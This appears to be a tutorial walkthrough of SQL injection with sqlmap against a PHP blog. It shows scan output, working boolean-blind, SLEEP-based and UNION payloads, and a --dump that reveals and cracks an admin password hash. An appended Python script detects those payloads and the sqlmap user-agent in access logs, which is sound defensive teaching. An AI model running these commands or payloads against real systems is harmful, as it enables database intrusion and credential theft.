10.3 : Web app exploitation - SQL injection (Part III)

Basic SQLmap Cracking

root@kali:/etc/nginx# sqlmap -u "" --forms
 ___ ___["]_____ ___ ___  {1.3.8#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:04:36 /2019-11-05/

[20:04:36] [INFO] testing connection to the target URL
[20:04:36] [INFO] heuristics detected web page charset 'ascii'
[20:04:36] [INFO] searching for forms
[#1] form:
POST data: title=
do you want to test this form? [Y/n/q]
[20:04:46] [INFO] using '/root/.sqlmap/output/results-11052019_0804pm.csv' as the CSV results file in multiple targets mode
[20:04:46] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to ''. Do you want to follow
[20:04:55] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:04:55] [INFO] testing if the target URL content is stable
[20:04:55] [WARNING] POST parameter 'title' does not appear to be dynamic
[20:04:55] [WARNING] heuristic (basic) test shows that POST parameter 'title' might not be i
[20:04:58] [INFO] testing for SQL injection on GET parameter 'id'
[20:04:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:04:58] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:04:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:04:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:04:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:04:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:04:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:04:58] [INFO] testing 'MySQL inline queries'
[20:04:58] [INFO] testing 'PostgreSQL inline queries'
[20:04:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:04:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:04:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:04:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:04:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:04:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:04:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:04:58] [INFO] testing 'Oracle AND time-based blind'
[20:04:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:04:58] [WARNING] GET parameter 'id' does not seem to be injectable
[20:04:58] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next form
[20:04:58] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-11052019_0804pm.csv'
[20:04:58] [WARNING] you haven't updated sqlmap for more than 95 days!!!

[*] ending @ 20:04:58 /2019-11-05/

The basic injection does not seem to be working.

Let's dig deeper.

sqlmap -u "" --cookie="PHPSESSID=pgtggk7cnqjeh8c4mi9l0k7on5"
[20:08:07] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
sqlmap identified the following injection point(s) with a total of 55 HTTP(s) re
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1655=1655

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 8306 FROM (SELECT(SLEEP(5)))SjzK)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-5519 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x7376414456b71),NULL-- fAxL
[20:08:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
[20:08:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'
[20:08:12] [WARNING] you haven't updated sqlmap for more than 95 days!!!

[*] ending @ 20:08:12 /2019-11-05/

We have a great result.

Now let's dump the data and crack the hash.

sqlmap -u "" --cookie="PHPSESSID=pgtggk7cnqjeh8c4mi9l0k7on5" --dump

[20:10:06] [INFO] cracked password 'P4ssw0rd' for user 'admin'
Database: blog
Table: users
[1 entry]
| id | login | password                                    |
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |

Got it.
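
From the defender's side, the three injection points sqlmap reported above (boolean-based `AND n=n`, time-based `SLEEP(n)`, and `UNION ALL SELECT NULL,...`) leave recognisable traces in the web server's access log. The following Python script is an added example, not part of the original notes or of sqlmap itself: it URL-decodes each request in a few constructed Apache combined-format log lines and flags the ones matching those payload shapes. The `sqlmap/` user-agent check is only a weak extra signal, since the `--random-agent` switch mentioned in the output above replaces it.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (sample data, not from the original page).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Nov/2019:20:08:07 +0000] "GET /blog.php?id=1%20AND%201655%3D1655 HTTP/1.1" 200 512 "-" "sqlmap/1.3.8#stable (http://sqlmap.org)"
203.0.113.5 - - [05/Nov/2019:20:08:09 +0000] "GET /blog.php?id=1%20AND%20%28SELECT%208306%20FROM%20%28SELECT%28SLEEP%285%29%29%29SjzK%29 HTTP/1.1" 200 512 "-" "sqlmap/1.3.8#stable (http://sqlmap.org)"
203.0.113.5 - - [05/Nov/2019:20:08:11 +0000] "GET /blog.php?id=-5519%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x717a627a71%2C0x73764144%29%2CNULL--%20fAxL HTTP/1.1" 200 740 "-" "sqlmap/1.3.8#stable (http://sqlmap.org)"
198.51.100.7 - - [05/Nov/2019:20:09:00 +0000] "GET /blog.php?id=5 HTTP/1.1" 200 600 "-" "Mozilla/5.0"
"""

# Apache combined log format: client IP, request line (method + path), status, size, referer, UA.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# One signature per technique sqlmap reported; applied to the URL-decoded, lower-cased path.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\band\s+(\d+)\s*=\s*\1\b"),   # AND 1655=1655
    "time-based blind":    re.compile(r"\bsleep\s*\(\s*\d+\s*\)"),     # SLEEP(5)
    "union query":         re.compile(r"\bunion\s+(all\s+)?select\b"), # UNION ALL SELECT
}
# Default sqlmap user-agent prefix; absent when the scan runs with --random-agent.
TOOL_UA_RE = re.compile(r"^sqlmap/", re.IGNORECASE)


def classify_request(path, user_agent):
    """Return the technique labels whose signature matches this request (empty if clean)."""
    decoded = unquote_plus(path).lower()
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if TOOL_UA_RE.match(user_agent):
        hits.append("sqlmap user-agent")
    return hits


def scan_log(text):
    """Return (ip, path, labels) for every parsable log line that trips at least one signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        labels = classify_request(m["path"], m["ua"])
        if labels:
            findings.append((m["ip"], m["path"], labels))
    return findings


if __name__ == "__main__":
    for ip, path, labels in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(labels)}")
```

Running it against a real access log is a matter of passing the file's contents to `scan_log`; the benign request for `id=5` produces no finding, so the output is only the three sqlmap probes.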